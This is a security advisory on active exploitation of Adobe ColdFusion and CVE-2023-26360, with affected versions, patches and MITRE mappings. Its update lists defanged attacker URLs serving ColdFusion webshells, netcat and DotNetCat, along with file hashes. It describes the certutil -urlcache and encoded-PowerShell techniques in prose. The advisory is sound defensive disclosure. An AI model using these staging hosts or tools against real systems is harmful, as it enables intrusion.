Adobe ColdFusion zero-day vulnerability exploited

Update – Adobe ColdFusion vulnerability exploited (21st March 2023 at 15:13 UTC)

Overview

Active exploitation of Adobe ColdFusion vulnerabilities has been detected by cyber security researchers at Rapid7. At the time of writing, the reported instances have not been attributed to the recently reported Adobe ColdFusion vulnerability, tracked as CVE-2023-26360. However, a potential association has not been explicitly ruled out as of yet.

The timeline of the reported exploitation dates back to January 2023. Investigations have indicated that a threat actor deployed webshells using an encoded PowerShell command, a technique applied when redirecting strings into files when creating webshells.

Moreover, the instance discovered the utilisation of the ‘certutil.exe’ binary with the ‘-urlcache’ flag being passed to it, a technique that is applied by threat actors to retrieve files hosted on a remote web server.

Updated Indicators of Compromise

Network indicators:

– www.av-iq[.]com – FQDN
– www.ooshirts[.]com – FQDN
– hXXps://www.av-iq[.]com/wow.txt – FQDN
– hXXps://www.ooshirts[.]com/images/zzz.txt – FQDN
– hXXps://www.ooshirts[.]com/images/dncat.exe – URL
– hXXp://www.ooshirts[.]com/images/nc.exe – URL

File hashes (SHA- 256):

– e77d6a10370db19b97cacaeb6662ba79f34087d6eaa46f997ea4956e2ad2f245
– 2482ab79ecb52e1c820ead170474914761358d3cee16e3377fd6e031d3e6cc25
– 03b06d600fae4f27f6a008a052ea6ee4274652ab0d0921f97cfa222870b1ddc3
– be56f5ed8e577e47fef4e0a287051718599ca040c98b6b107c403b3c9d3ee148
– ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419
– 213079ef54d225c4ca75dd0d57c931bdc613e8c89a2d0dbff88be5b446d231f0

File hashes (SHA-1):

– dac7867ee642a65262e153147552befb0b45b036
– 5d95fb365b9d0ceb568bb0c75cb1d70707723f27

File hashes (MD-5):

– 1edf1d653deb9001565b5eff3e50824a
– 470797a25a6b21d0a46f82968fd6a184

Files:

– WOW.TXT – ColdFusion WebShell
– wow.txt – ColdFusion WebShell
– www.txt – ColdFusion WebShell
– www.cfm – ColdFusion WebShell
– wow1.cfm – ColdFusion WebShell
– zzz.txt – ColdFusion WebShell
– dncat.exe – DotNetCat
– nc.exe – NetCat

Updated Mitre Methodologies

Tactic:

TA0042– Resource Development

 

Target Industry

Indiscriminate, opportunistic targeting.

Overview

Severity Level – Critical: Compromise may result in the loss of confidentiality and integrity of data.

A critical arbitrary code execution security flaw has been disclosed as affecting Adobe ColdFusion. The vulnerability, tracked as CVE-2023-26360 (CVSSv3 score: 8.6), is caused by an Improper Access Control weakness and has the potential to be exploited by remote unauthenticated threat actors in low-complexity attacks. Adobe reported  that the vulnerability is currently being exploited in the wild “in very limited attacks”.

The vulnerability was added by the Cybersecurity and Infrastructure Security Agency (CISA) to its catalogue of security flaws exploited in the wild and they have given Federal Civilian Executive Branch (FCEB) agencies until 5th April 2023 to apply the relevant updates to safeguard their networks against potential threats.

Impact

Successful exploitation of CVE-2023-26360 could enable threat actors to gain arbitrary code execution and arbitrary file system read capabilities, in relation to the affected Adobe product versions.

Vulnerability Detection

Adobe has released patches pertaining to the security flaw for the respective product versions. As such, previous versions are vulnerable to the potential exploits.

Affected Products

– Adobe ColdFusion 2018: Update 15 and earlier
– Adobe ColdFusion 2021: Update 5 and earlier

It should be noted that CVE-2023-26360 also affects Adobe ColdFusion 2016 and ColdFusion 11 installations, neither of which are supported as they have reached end-of-life (EoL).

Containment, Mitigations & Remediations

It is strongly recommended that administrators apply the following Adobe updates:

– Adobe ColdFusion 2018: Update 16
– Adobe ColdFusion 2021: Update 6

Indicators of Compromise

No specific Indicators of Compromise (IoCs) are available at this time.

Threat Landscape

Adobe occupies a significant portion of the application-development market share. Threat actors generally utilise a combination of probability and asset value to determine which attack surfaces to focus on. As a result, application-development products can emerge as a prime target. Due to the fact that Adobe products have become an integral aspect of personal and business operations, threat actors will continue to exploit the associated vulnerabilities in an attempt to exfiltrate sensitive data contained therein or impact associated business operations.

Threat Group

No attribution to specific threat actors or groups has been identified at the time of writing.

Mitre Methodologies

Tactic:

– TA0004 – Privilege Escalation

Technique:

– T1055.001– Process Injection: Dynamic-link Library Injection

Common Weakness Enumeration:

– CWE-284 – Improper Access Control

Further Information

Adobe Advisory
AttackerKB Vulnerability Profile